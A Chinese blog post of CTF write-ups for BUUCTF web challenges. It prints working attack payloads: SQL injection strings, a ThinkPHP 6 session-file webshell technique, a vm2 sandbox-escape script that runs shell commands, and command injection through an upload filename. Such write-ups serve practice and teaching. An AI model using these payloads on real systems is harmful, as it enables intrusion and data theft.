buu第五页 wp

已于 2023-10-22 17:15:49 修改
阅读量354 收藏
点赞数 1
分类专栏: BUUCTF 文章标签: web安全 网络安全
于 2023-10-22 17:14:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/akxnxbshai/article/details/133975151
版权

[RootersCTF2019]babyWeb

预期解

一眼就是sql注入,发现过滤了

UNION SLEEP ' " OR - BENCHMARK

盲注没法用了,因为union被过滤,堆叠注入也不考虑,发现报错有回显,尝试报错注入。

尝试:

1||(updatexml(1,concat(0x7e,(select database())),0x7e))

在这里插入图片描述

得到数据库,继续注入得到列名,表名。

1||(updatexml(1,concat(0x3a,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))),1))

在这里插入图片描述

表名:users

1||(updatexml(1,concat(0x3a,(select group_concat(column_name) from information_schema.columns where table_name=0x7573657273)),1)) 
输出不全,用limit一个一个来
1||(updatexml(1,concat(0x3a,(select column_name from information_schema.columns where table_name=0x7573657273 limit 4,1)),1))

在这里插入图片描述

发现所需数据

1||(updatexml(1,concat(0x3a,(select uniqueid from sql_injection.users limit 1)),1))

在这里插入图片描述

得到uniqueid,直接输入即可得到flag。

在这里插入图片描述

非预期

用order by测试时,发现uniqueid只有两列

union被过滤无法直接查询,猜测利用正确的uniqueid登陆后即可得到flag,既然我们本来就是要通过注入去得到flag,那么我们也可以直接让其查询返回正确的uniqueid,直接用万能payload。

1||1=1 limit 1
SELECT * FROM users WHERE uniqueid=1||1=1 limit 1

在这里插入图片描述

题目位置:https://gitlab.com/0xCC00FFEE/RootersCTF2019-challenges

可以自己去本地复现,然后看一下1||1=1 limit 1的原理。

[GYCTF2020]EasyThinking

发现有登陆注册搜索等功能

在这里插入图片描述

初步尝试后发现不是sql注入。

在这里插入图片描述

发现是ThinkPHP V6.0.0,该版本存在漏洞。

ThinkPHP6 任意文件操作漏洞分析 (seebug.org)

修改session然后搜索数据。

搜索的数据会自动存到session文件里,每一个PHPSESSID对应一个session文件,可以控制PHPSESSID去修改session文件。

先登录生成session文件。

在这里插入图片描述

然后利用搜索存入一句话木马。

在这里插入图片描述

蚁剑连接。

在这里插入图片描述

然后利用插件提权,运行readflag得到flag

在这里插入图片描述

得到flag。

本地主要是利用任意文件写入漏洞写入一句话木马,一共有三个地方可能存在写入操作,登陆时的username,password以及搜索时的key,经过测试,登陆时的数据并不存入session文件中,因此只能用搜索时的key,本地复现后直接可以全局搜索文件内容即可发现session文件位置,也可以去看代码分析。

利用%2F…%2F…%2F…%2F123456789012345678.php写入的结果。

在这里插入图片描述

在这里插入图片描述

经测试,当PHPSESSID=%2F…%2F…%2F…%2F123456789012345678.php,无法成功登录然后去进行搜索,因此没法同时直接控制文件的位置、名称、内容。

在这里插入图片描述

[HFCTF2020]JustEscape

vm沙箱逃逸,发现有过滤。

['+', '"',''','for', 'while', 'process', 'exec', 'eval', 'constructor', 'prototype', 'Function']

在这里插入图片描述

逃逸poc:https://github.com/patriksimek/vm2/issues/225

利用KaTeX parse error: Expected '}', got 'EOF' at end of input: {`{prototyp}e`}这种方式绕过过滤

(function(){
	TypeError[`${`${`prototy`}pe`}`][`${`${`get_proces`}s`}`] = f=>f[`${`${`constructo`}r`}`](`${`${`return this.proces`}s`}`)();
	try{
		Object.preventExtensions(Buffer.from(``)).a = 1;
	}catch(e){
		return e[`${`${`get_proce`}ss`}`](()=>{}).mainModule[`${`${`requir`}e`}`](`${`${`child_proces`}s`}`)[`${`${`exe`}cSync`}`](`cat /f*`).toString();
	}
})()

在这里插入图片描述

[GXYCTF2019]StrongestMind

简简单单的计算,直接套之前的脚本。

感觉有个师傅的脚本逻辑很不错,用一下

import requests
import re
import time

session = requests.session()

url = 'http://ea3579dc-520a-46ea-9f0e-6842ba17b19c.node4.buuoj.cn:81/index.php'
req = session.get(url).text
for i in range(1100):
	try:
		result = re.findall("<br><br>(\d.+)<br><br>",req)
		result = "".join(result)
		result = eval(result)
		data = {"answer":result}
		print("time: "+ str(i) +"   "+"result: "+ str(result))
		req = session.post(url,data=data).text
		if "flag{" in req:
			print(re.search("flag{.*}", req).group(0)[:50])
			break
		time.sleep(0.1)
	except:
		print("[-]")

在这里插入图片描述

[GKCTF 2021]easycms

后台密码为: admin/12345

任意文件下载

在主题导出处存在任意文件下载漏洞。

在这里插入图片描述

代码注入

发现在幻灯片处可以编辑php代码。

在这里插入图片描述

但需要我们上传一个文件:/var/www/html/system/tmp/jdhp.txt

在上传素材处可以上传txt文件。

先上传一个txt文件。

在这里插入图片描述

看地址,很明显可以去修改上传到的地址。

将其地址给改了。

在这里插入图片描述

即可编辑php代码,在前台页面即可触发php代码。

在这里插入图片描述

后续

在尝试中,我还发现了附件上传的后缀名。

在这里插入图片描述

发现写入php会被删除,尝试了双写,直接报错。

在这里插入图片描述

也尝试了phtml,猜测他匹配删除之后会再进行一次判断,所以没法绕过。

在编码模板的地方可以修改文件代码,连接蚁剑。

在这里插入图片描述

上去把代码给down了下来,后边再看看。

[N1CTF 2018]eating_cms

比较喜欢这种题,学到了不少。

开局一个登录框,尝试sql注入没成功,扫一下发现有register.php。

注册后登录。

在这里插入图片描述

看了一会,没啥功能,但是发现了page参数,随便改一下。

在这里插入图片描述

页面回显有点可疑。

读取flag没成功,尝试了好久才发现了只能读取php文件。

伪协议读一下,看一下代码。

user.php

<?php
require_once("function.php");
if( !isset( $_SESSION['user'] )){
    Header("Location: index.php");

}
if($_SESSION['isadmin'] === '1'){
    $oper_you_can_do = $OPERATE_admin;
}else{
    $oper_you_can_do = $OPERATE;
}
//die($_SESSION['isadmin']);
if($_SESSION['isadmin'] === '1'){
    if(!isset($_GET['page']) || $_GET['page'] === ''){
        $page = 'info';
    }else {
        $page = $_GET['page'];
    }
}
else{
    if(!isset($_GET['page'])|| $_GET['page'] === ''){
        $page = 'guest';
    }else {
        $page = $_GET['page'];
        if($page === 'info')
        {
//            echo("<script>alert('no premission to visit info, only admin can, you are guest')</script>");
            Header("Location: user.php?page=guest");
        }
    }
}
filter_directory();
//if(!in_array($page,$oper_you_can_do)){
//    $page = 'info';
//}
include "$page.php";
?>

在读取一下function.php

<?php
session_start();
require_once "config.php";
function Hacker()
{
    Header("Location: hacker.php");
    die();
}


function filter_directory()
{
    $keywords = ["flag","manage","ffffllllaaaaggg"];
    $uri = parse_url($_SERVER["REQUEST_URI"]);
    parse_str($uri['query'], $query);
//    var_dump($query);
//    die();
    foreach($keywords as $token)
    {
        foreach($query as $k => $v)
        {
            if (stristr($k, $token))
                hacker();
            if (stristr($v, $token))
                hacker();
        }
    }
}

function filter_directory_guest()
{
    $keywords = ["flag","manage","ffffllllaaaaggg","info"];
    $uri = parse_url($_SERVER["REQUEST_URI"]);
    parse_str($uri['query'], $query);
//    var_dump($query);
//    die();
    foreach($keywords as $token)
    {
        foreach($query as $k => $v)
        {
            if (stristr($k, $token))
                hacker();
            if (stristr($v, $token))
                hacker();
        }
    }
}

function Filter($string)
{
    global $mysqli;
    $blacklist = "information|benchmark|order|limit|join|file|into|execute|column|extractvalue|floor|update|insert|delete|username|password";
    $whitelist = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'(),_*`-@=+><";
    for ($i = 0; $i < strlen($string); $i++) {
        if (strpos("$whitelist", $string[$i]) === false) {
            Hacker();
        }
    }
    if (preg_match("/$blacklist/is", $string)) {
        Hacker();
    }
    if (is_string($string)) {
        return $mysqli->real_escape_string($string);
    } else {
        return "";
    }
}

function sql_query($sql_query)
{
    global $mysqli;
    $res = $mysqli->query($sql_query);
    return $res;
}

function login($user, $pass)
{
    $user = Filter($user);
    $pass = md5($pass);
    $sql = "select * from `albert_users` where `username_which_you_do_not_know`= '$user' and `password_which_you_do_not_know_too` = '$pass'";
    echo $sql;
    $res = sql_query($sql);
//    var_dump($res);
//    die();
    if ($res->num_rows) {
        $data = $res->fetch_array();
        $_SESSION['user'] = $data[username_which_you_do_not_know];
        $_SESSION['login'] = 1;
        $_SESSION['isadmin'] = $data[isadmin_which_you_do_not_know_too_too];
        return true;
    } else {
        return false;
    }
    return;
}

function updateadmin($level,$user)
{
    $sql = "update `albert_users` set `isadmin_which_you_do_not_know_too_too` = '$level' where `username_which_you_do_not_know`='$user' ";
    echo $sql;
    $res = sql_query($sql);
//    var_dump($res);
//    die();
//    die($res);
    if ($res == 1) {
        return true;
    } else {
        return false;
    }
    return;
}

function register($user, $pass)
{
    global $mysqli;
    $user = Filter($user);
    $pass = md5($pass);
    $sql = "insert into `albert_users`(`username_which_you_do_not_know`,`password_which_you_do_not_know_too`,`isadmin_which_you_do_not_know_too_too`) VALUES ('$user','$pass','0')";
    $res = sql_query($sql);
    return $mysqli->insert_id;
}

function logout()
{
    session_destroy();
    Header("Location: index.php");
}

?>

在user.php中有个方法filter_directory();跳进function.php。

是一个过滤,url数据中不能有[“flag”,“manage”,“ffffllllaaaaggg”,“info”]。

function filter_directory_guest()
{
    $keywords = ["flag","manage","ffffllllaaaaggg","info"];
    $uri = parse_url($_SERVER["REQUEST_URI"]);
    parse_str($uri['query'], $query);
//    var_dump($query);
//    die();
    foreach($keywords as $token)
    {
        foreach($query as $k => $v)
        {
            if (stristr($k, $token))
                hacker();
            if (stristr($v, $token))
                hacker();
        }
    }
}

利用了parse_url将[“flag”,“manage”,“ffffllllaaaaggg”,“info”]给过滤了,绕过后读取ffffllllaaaaggg.php

url+///user.php?page=php://filter/read=convert.base64-encode/resource=ffffllllaaaaggg

ffffllllaaaaggg.php

<?php
if (FLAG_SIG != 1){
    die("you can not visit it directly");
}else {
    echo "you can find sth in m4aaannngggeee";
}
?>

它提示让我们去m4aaannngggeee。

在这里插入图片描述

发现一个文件上传,尝试上传。

发现上传功能是依靠upllloadddd.php实现的,再读取upllloadddd.php看一下。

<?php
$allowtype = array("gif","png","jpg");
$size = 10000000;
$path = "./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/";
$filename = $_FILES['file']['name'];
if(is_uploaded_file($_FILES['file']['tmp_name'])){
    if(!move_uploaded_file($_FILES['file']['tmp_name'],$path.$filename)){
        die("error:can not move");
    }
}else{
    die("error:not an upload file!");
}
$newfile = $path.$filename;
echo "file upload success<br />";
echo $filename;
$picdata = system("cat ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/".$filename." | base64 -w 0");
echo "<img src='data:image/png;base64,".$picdata."'></img>";
if($_FILES['file']['error']>0){
    unlink($newfile);
    die("Upload file error: ");
}
$ext = array_pop(explode(".",$_FILES['file']['name']));
if(!in_array($ext,$allowtype)){
    unlink($newfile);
}
?>

一眼就看到了漏洞。

在这里插入图片描述

因为$filename可控,可以直接命令执行,但上边有一个上传和法检测

在这里插入图片描述

尝试后发现了/被过滤

在这里插入图片描述

所以不用/即可。

先ls找一下flag。

在这里插入图片描述

发现flag位置,直接读取。

在这里插入图片描述

f0njl
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
BUU-CTF——WP(MISC[1~20])
hahaha233330的博客
09-11 1155
好久没更新了,手生得很,重新练起来! 这次挑战BUU,贴一下网址:BUU-CTF 一大堆在线工具:MD5 Url、base64、哈希/散列 凯撒、维吉尼亚、猪圈、摩斯 Cryptp 1、MD5 直接用在线工具解密即可得到flag。 ...
BUU 论坛的编辑器163Editor
09-21
"BUU 论坛的编辑器163Editor"是一个专为BUU论坛设计的文本编辑工具,它可能集成了丰富的富文本编辑功能,让用户在论坛发帖或回帖时可以方便地添加格式化文本、图片、链接等元素,提升交互体验。"DianUbb.rar"是这个...
BUU第一wp
2301_79525044的博客
03-09 435
注意strlen()函数,使用\x00截断,接着使用ret2libc的方法解决。func函数中存在栈溢出且存在system函数,可直接获取flag。vuln函数中,会将输入的I转化为三字节的you可以实现栈溢出。checksec发现为64位文件,开启了NX保护。存在system函数,/bin/sh字符串与栈溢出。发现后门函数,直接栈溢出到后门函数获取shell。观察主函数,发现system("/bin/sh")checksec发现为64位文件,开启了NX保护。栈溢出到后门函数,直接将flag打印出来了。
BUU第二wp(除堆题)
2301_79525044的博客
03-15 270
可以看到,选择1后,会直接将我们的输入作为system的参数,所以直接传入cat flag即可,要注意使用||或&分割,不然会传入其他数据,导致命令无法执行。vuln函数中存在栈溢出,接下来就是ret2libc了。32位,开了canary,下载这个附件居然有病毒,离谱。gift中存在格式化字符串漏洞,可泄露canary。存在后门函数,直接栈溢出返回到后门函数即可。64位开启了NX保护和canary保护。存在栈溢出,典型的ret2libc。64位RELRO全开,开启了pie。直接写入shellcode即可。
buu刷题 GWCTF re3 wp
苗_的博客
08-19 329
先拖进ida里f5找到主函数: 可以看到sub_402219是一堆数据,这里是SMC自修改代码(异或0x99),去混淆: 写一个idc脚本,将数据还原: #include <idc.idc> static main() { auto addr = 0x402219; auto i; for(i = 0; i <= 223; ++i){ PatchByte(addr+i,Byte(addr+i)^0x99); } } 然
BUU Youngter-drive wp
__ys的博客
04-22 233
Youngter-drive 拿到题目,发现有upx壳,先去壳,然后丢入IDA 分析 看到这里我们应该先了解一下关于Windows多线程的知识 CreateThread是一种微软在Windows API中提供了建立新的线程的函数,该函数在主线程的基础上创建一个新线程。线程终止运行后,线程对象仍然在系统中,必须通过CloseHandle函数来关闭该线程对象。 可以看出主函数中创建了2个子线程,我们分别进行分析 StartAddress: 这里我们回到main函数中打开sub_411190()函数可以找
Misc Buu wp 1
Misous的博客
09-01 295
一个完整的 JPG 文件由 FF D8 开头,FF D9结尾 图片浏览器会忽略 FF D9 以后的内容,因此可以在 JPG 文件中加入其他文件。其余同理: png十进制数137 80 78 71 13 10 26 10十六进制数 89 50 4e 47 0d 0a 1a 0agif 图像开始标志:47 49 46 38 39 61 结束标志:01 01 00 3B 1.用工具HexEditXP解析二维码,找出隐藏压缩包,再保存一个.zip文件2.密码的话可以用python 代码简单爆破 3.再把密码输回得
buu web部分wp
qq_63267612的博客
08-14 402
访问/api/deal可以进行**,但是只要我们的 state 不会变,我们的余额就不会变,当我们的应答包含 BlackJack 的时候,我们的余额会增加,然后我们就可以获取它的 SerectState 进行下一次**,这样就可以一直赢了。得到cookie,到这里没有思路,查看wp提示和rack.session无关,所以尝试修改user的前三位为111,查看回显:得到报错信息。本题也就是每块内容被分成固定的大小块单独加密,推测为ECB模式,若是CBC模式,修改前面内容,后面内容会变成乱码。...
BUUCTF misc第二WP
东隅的博客
04-21 3303
梅花香之苦寒来 拿到图片后binwalk啥也没有,拖进010看16进制 文件结构很完整,但是FFD9后面跟着一大串数字字母,而且貌似还有一定规律。 把这些字符复制出来,将十六进制转为字符 。 有情况得到了一堆坐标,那不就明白咋回事了吗,类似坐标, 利用python中的matplotlib模块对该段坐标进行绘图得到二维码 1.txt文本文档要写成这种格式: 扫码得到flag `flag{40fc0a979f759c8892f4dc.....
buu [第五空间2019 决赛]PWN5 wp
n1ptune__的博客
05-02 218
存在格式化字符串漏洞 经过尝试发现偏移为10 from pwn import * addr=0x804c044 p=remote("node3.buuoj.cn",29172) #%10$n的意思是向偏移为10处所指向的地址处写入已经写的字符数 #即 mov [%10$n] , 字符数 payload=p32(addr)+"%10$n" p.sendline(payload) #p32写入的字符数是4 p.sendline("4") p.interactive() ...
apachecn#apachecn-ctf-wiki#[WPBUU/CTF]Cookie-Store-题解_車鈊的博客-CSD
07-25
来源:,涉及Cookie的使用方法操作方
POSN:POSN-BUU的源代码
04-01
7. **第三方库**:C++生态系统中有许多优秀的第三方库,如Boost、Eigen(用于线性代数计算)、Google Protocol Buffers(用于数据序列化)等,POSN-BUU可能依赖其中的一些进行开发。 8. **编译与构建工具**:项目...
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
05-26
5. 使用调试信息:如果可用,调试信息(如DWARF)可以帮助映射WASM代码到源代码行,使逆向分析更容易。 6. 动态分析:通过在实际环境中运行WASM代码并监控其行为,可以发现更多关于功能和潜在漏洞的信息。 在"BUU-...
自学黑客(网络安全
最新发布
xv7676的博客
07-09 501
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。此时我们的选择也可以很多,比如CSDN,比如知乎,再比如B站,都有很多人在分享自己的学习资料,但我觉得这里存在的很大一个问题就是不连贯、不完善,大部分免费分享的教程,都是东一块西一块,前言不搭后语,学着学着就蒙了,这是我自学之后的亲身感受。当然现在市面上很多网站都是PHP的开发的,所以选择PHP也是可以的。
印尼网络安全治理能力观察
网络研究观
07-05 1078
这不是第一次,而且很可能也不会是最后一次。
网络安全主动防御技术与应用
weixin_48579910的博客
07-05 1152
入侵阻断技术是保护网络和系统免受各种网络攻击的关键措施。通过部署和配置NGFW、IDS/IPS、行为分析、网络隔离、恶意软件防护和零信任安全架构等技术,组织可以有效防御各种网络威胁。结合持续监控、定期评估和改进措施,可以增强整体网络安全性,保护关键资产和敏感数据。软件白名单技术是一种主动的安全措施,通过严格控制允许运行的应用程序,有效防止恶意软件和未经授权的软件执行。尽管管理复杂性较高,但其预防性和严格控制特性使其成为高安全性环境中的重要安全工具。
web 网络安全
weixin_43506403的博客
07-09 616
Web网络安全网络安全的一个重要分支,专注于保护Web应用程序、服务和网站免受各种网络威胁。
buu cipher
10-23
Buu Cipher 的加密过程可以简单地分为两个步骤:混淆和扩散。 首先,混淆步骤使用一个密钥和置换表对明文进行置换。置换表是由密钥生成的,用于打乱明文中字符的顺序。这样,原本明文中相邻的字符将被分散到密文中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

f0njl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值